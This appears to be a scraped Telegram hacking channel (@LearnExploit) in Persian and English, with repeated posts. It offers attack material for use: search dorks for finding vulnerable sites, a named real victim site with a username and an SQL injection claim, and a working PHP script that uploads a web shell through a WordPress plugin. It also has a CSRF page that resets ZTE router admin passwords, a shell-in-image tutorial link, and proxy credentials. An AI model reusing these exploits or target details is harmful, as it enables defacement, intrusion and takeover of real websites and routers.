#Hacked By #X0P4SH4
https://mirror-h.org/zone/1605238/
Heh.... just for fun :)
@LearnExploit
0Day.Today
https://mirror-h.org/zone/1605238/
Heh.... just for fun :)
@LearnExploit
0Day.Today
نحوه ی هک (دیفیس) سایت توسط باگ Url Posting
#Url_Posting #Bug #Deface
-------------------------------
همان طور که از اسم سایت پیداست شما میتونید با استفاده از این باگ و به وسیله ی URL در سایت تغییراتی ایجاد کنید.
دورک مورد استفاده دراین باگ :
<Start ~ Dorks >
| site:ua "j images jdownloads screenshots version php j"
| site:ua "wp content uploads gravity forms index php option com jdownloads"
| site:ua "plugins editors jce tiny mce plugins cfg contactform"
| site:ua "cfg contactform"
<end ~ Dorks>
~~~~~~~~~~~~~~
POC ~ Exploiting :
just change Url of site ::::
http[s]://Example.me/HACKED-BY-X0P4SH4
:)
#X0P4SH4
t.me/LearnExploit
0Day.Today
#Url_Posting #Bug #Deface
-------------------------------
همان طور که از اسم سایت پیداست شما میتونید با استفاده از این باگ و به وسیله ی URL در سایت تغییراتی ایجاد کنید.
دورک مورد استفاده دراین باگ :
<Start ~ Dorks >
| site:ua "j images jdownloads screenshots version php j"
| site:ua "wp content uploads gravity forms index php option com jdownloads"
| site:ua "plugins editors jce tiny mce plugins cfg contactform"
| site:ua "cfg contactform"
<end ~ Dorks>
~~~~~~~~~~~~~~
POC ~ Exploiting :
just change Url of site ::::
http[s]://Example.me/HACKED-BY-X0P4SH4
:)
#X0P4SH4
t.me/LearnExploit
0Day.Today
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
#TarGet
~ :
http://www.janinedrayson.co.uk/
#User
~ :
Janinedr
#Pass
~:
Find By self :)
#Bug
~:
Sql
Have Nice day !
there [0Day.Today] Of telegram
ID : @LearnExploit
~ :
http://www.janinedrayson.co.uk/
#User
~ :
Janinedr
#Pass
~:
Find By self :)
#Bug
~:
Sql
~~~~~~~~~~~~
Have Nice day !
I'm X0P4SH4
there [0Day.Today] Of telegram
ID : @LearnExploit
#WP(Wordpress) #Hacking #Plugin (Peugeot-Music-Plugin) #Exploit
-------------~______~---------
#Dork
~:
inurl:"/wp-content/plugins/peugeot-music-plugin/"
#Vul Url :
~:
"wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"
#Exploit
~:
<?php
$url = "http://target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"; // put URL Here
$post = array
(
"file" => "@yourshell.jpg",
"name" => "yourshell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
⭕️ For CSRF using php xampp.
#Shell_Locate:
~:
target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/uploads/yourshell.php
========================
#GOODNIGHT
#X0P4SH4
T.me/LearnExploit
0Day.Today
-------------~______~---------
#Dork
~:
inurl:"/wp-content/plugins/peugeot-music-plugin/"
#Vul Url :
~:
"wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"
#Exploit
~:
<?php
$url = "http://target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/upload.php"; // put URL Here
$post = array
(
"file" => "@yourshell.jpg",
"name" => "yourshell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>
⭕️ For CSRF using php xampp.
#Shell_Locate:
~:
target.com/wp-content/plugins/peugeot-music-plugin/js/plupload/examples/uploads/yourshell.php
========================
#GOODNIGHT
#X0P4SH4
T.me/LearnExploit
0Day.Today
👍1
اموزش نحوه ی #اکسپلویت #روتر های TeDate-ZTE
How to #Exploit #TeDate_ZTE #Rauter's
---> ~# @LearnExploit
---------
How to #Exploit #TeDate_ZTE #Rauter's
---> ~# @LearnExploit
---------
title :
( #TeDate_ZTE #Exploiting )
#Url_Patch
~#
/forms/tools_admin_1/
#Exploit
~#
<html>
<body onload="document.alqnas.submit()">
<form action="http://192.168.1.1/Forms/tools_admin_1" method="post" name="alqnas"> //Put Here Ur Rauter IP
<input type="hidden" name="uiViewTools_Password" value="new pass" />
<input type="hidden" name="uiViewTools_PasswordConfirm" value="new pass" />
</form>
</body>
</html>
#Explanations
~#
این باگ از نوع CSRF بوده و در این اکسپلویت درخواست تغییر یوزرنیم و پسورد رو میده
روش اجرا :
موارد زیر رو به نفع خودتون تغییر بدید 😄 :
name="Ur New Username "
value="Ur New Pass"
value="config Ur New Pass"
سپس اکسپلویت رو با پسوند .html سیو کرده
و اجرا کنید :)
روتر یوزر و پسورد جدید رو دریافت کرده :)
================
#X0P4SH4
-->
@LearnExploit ~ 0Day.Today
( #TeDate_ZTE #Exploiting )
#Url_Patch
~#
/forms/tools_admin_1/
#Exploit
~#
<html>
<body onload="document.alqnas.submit()">
<form action="http://192.168.1.1/Forms/tools_admin_1" method="post" name="alqnas"> //Put Here Ur Rauter IP
<input type="hidden" name="uiViewTools_Password" value="new pass" />
<input type="hidden" name="uiViewTools_PasswordConfirm" value="new pass" />
</form>
</body>
</html>
#Explanations
~#
این باگ از نوع CSRF بوده و در این اکسپلویت درخواست تغییر یوزرنیم و پسورد رو میده
روش اجرا :
موارد زیر رو به نفع خودتون تغییر بدید 😄 :
name="Ur New Username "
value="Ur New Pass"
value="config Ur New Pass"
سپس اکسپلویت رو با پسوند .html سیو کرده
و اجرا کنید :)
روتر یوزر و پسورد جدید رو دریافت کرده :)
================
#X0P4SH4
-->
Router Hacking
@LearnExploit ~ 0Day.Today
👍1
Forwarded from Deleted Account
wpscan.ogv.rar
13.5 MB
اموزش نحوه ی مخفی کردن شل در پشت عکس برای الپلود به سرور
How To #bind #shell behind the #image (JPG format )
dl Link : http://www.mediafire.com/file/b1jpmzun52y5ccp/Bind%20Shell.mp4
@LearnExploit
How To #bind #shell behind the #image (JPG format )
dl Link : http://www.mediafire.com/file/b1jpmzun52y5ccp/Bind%20Shell.mp4
@LearnExploit
#Proxy
#0Day_Today_Learn_Exploit_Zero_World_Dark_web
#Armia_Evil
Server: 54.36.14.217
Port: 1414
Secret: 42f4d2c4997e6668c910c2892f8d9a72
Country: 🇫🇷 France
City: Paris
🆔 @LearnExploit
#0Day_Today_Learn_Exploit_Zero_World_Dark_web
#Armia_Evil
Server: 54.36.14.217
Port: 1414
Secret: 42f4d2c4997e6668c910c2892f8d9a72
Country: 🇫🇷 France
City: Paris
🆔 @LearnExploit
#Proxy
#0Day_Today_Learn_Exploit_Zero_World_Dark_web
#Armia_Evil
Server: 159.69.45.12
Port: 4443
Secret: bbf55e7f2529a0814a194a757940de68
Country: 🇩🇪 Germany
City: Gunzenhausen (Frickenfelden)
🆔 @LearnExploit
#0Day_Today_Learn_Exploit_Zero_World_Dark_web
#Armia_Evil
Server: 159.69.45.12
Port: 4443
Secret: bbf55e7f2529a0814a194a757940de68
Country: 🇩🇪 Germany
City: Gunzenhausen (Frickenfelden)
🆔 @LearnExploit
#Proxy
#0Day_Today_Learn_Exploit_Zero_World_Dark_web
#Armia_Evil
Server: thunderdog.ddnsking.com
Port: 8898
Secret: 8c7168dc0ed683acc2582f131246de78
Country: 🇩🇪 Germany
City: Nuremberg
🆔 @LearnExploit
#0Day_Today_Learn_Exploit_Zero_World_Dark_web
#Armia_Evil
Server: thunderdog.ddnsking.com
Port: 8898
Secret: 8c7168dc0ed683acc2582f131246de78
Country: 🇩🇪 Germany
City: Nuremberg
🆔 @LearnExploit
#اخطار !
#warning !
طبق تحقیقاتی که کانال امنیتی iranpentester انجام داده هست
بعضی از اکسپلویت هایی که در سایت ثبت اکسپلویت به نام (CXSecurity) الوده و بدافزار میباشند.
برای مثال یکی از اکسپلویت های به لینک :
https://cxsecurity.com/issue/WLB-2012120184
الوده بوده
این اکسپلویت که به زبان پایتون میباشدهنگام اجرا باعث میشود دایرکتوری $HOME شما پاک شود.
دوستان عزیز هنگام استفاده از این نوع اکسپلویت ها دقت داشته باشید.
=======================
#X0P4SH4
@LEARNEXPLOIT
———- > 0Day.Today
#warning !
طبق تحقیقاتی که کانال امنیتی iranpentester انجام داده هست
بعضی از اکسپلویت هایی که در سایت ثبت اکسپلویت به نام (CXSecurity) الوده و بدافزار میباشند.
برای مثال یکی از اکسپلویت های به لینک :
https://cxsecurity.com/issue/WLB-2012120184
الوده بوده
این اکسپلویت که به زبان پایتون میباشدهنگام اجرا باعث میشود دایرکتوری $HOME شما پاک شود.
دوستان عزیز هنگام استفاده از این نوع اکسپلویت ها دقت داشته باشید.
=======================
#X0P4SH4
@LEARNEXPLOIT
———- > 0Day.Today
Cxsecurity
Microsoft Remote Desktop User/Password Reader MS12-020 - CXSecurity.com
dev.hangzhou has realised a new security note Microsoft Remote Desktop User/Password Reader MS12-020
اسکریپت اسخراج یوزر های موجود در دایرکتوری
/etc/password/
#Script #python (py) #linux (OS)
@learnexploit
/etc/password/
#Script #python (py) #linux (OS)
@learnexploit
extract users etcpassword.py
692 B
اسکریپت اسخراج یوزر های موجود در دایرکتوری
/etc/password/
#Script #python (py) #linux (OS)
@learnExploit ~ #X0P4SH4
/etc/password/
#Script #python (py) #linux (OS)
@learnExploit ~ #X0P4SH4
اسکریپت php (ارسال درخواست به سمت سرور)
#PHP #Script (This Script For Your Own Risques )
@LearnExploit
0day.Today
#PHP #Script (This Script For Your Own Risques )
@LearnExploit
0day.Today